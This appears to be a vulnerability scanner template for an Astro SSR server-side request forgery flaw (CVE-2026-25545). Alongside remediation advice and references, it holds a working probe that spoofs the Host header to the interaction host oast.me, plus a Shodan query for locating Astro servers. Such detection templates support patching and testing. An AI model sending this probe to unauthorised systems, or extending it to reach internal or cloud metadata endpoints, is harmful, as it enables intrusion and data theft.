id: CVE-2026-25545 info: name: Astro SSR - Server-Side Request Forgery author: ritikchaddha severity: high description: | Astro before 5.17.3 and @astrojs/node before 9.5.4 are vulnerable to full-read SSRF due to improper Host header validation in error page rendering, allowing attackers to redirect requests and access internal resources. impact: | Full-read SSRF allowing access to internal services, cloud metadata endpoints (AWS/GCP/Azure IMDS), environment files, and any host reachable from the server. remediation: | Upgrade to astro >= 5.17.3 or @astrojs/node >= 9.5.4. The fix reads prerendered error files directly from disk and validates the Host: header the same way X-Forwarded-Host was already validated. reference: - https://github.com/withastro/astro/security/advisories/GHSA-qq67-mvv5-fw3g - https://github.com/withastro/astro/pull/15473 - https://nvd.nist.gov/vuln/detail/CVE-2026-25545 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2026-25545 epss-score: 0.01414 epss-percentile: 0.69929 cwe-id: CWE-918 metadata: verified: true max-request: 1 vendor: astro product: astro shodan-query: http.component:"Astro" tags: cve,cve2026,astro,ssrf http: - method: GET path: - "{{BaseURL}}/{{randstr}}" headers: Host: "oast.me" matchers: - type: dsl dsl: - 'contains(body, "")' - 'contains(header, "X-Interactsh-Version")' - 'status_code == 404' condition: and # digest: 490a004630440220066e043a0cb435fc89ca48de8ee09ffbf22c7fa3368227c1180ca939d3fb14d40220489b96b1415b8af2cad3738d1fab339c27ebb40745aee939fc20945e979c8c86:922c64590222798bb761d5b6d8e72950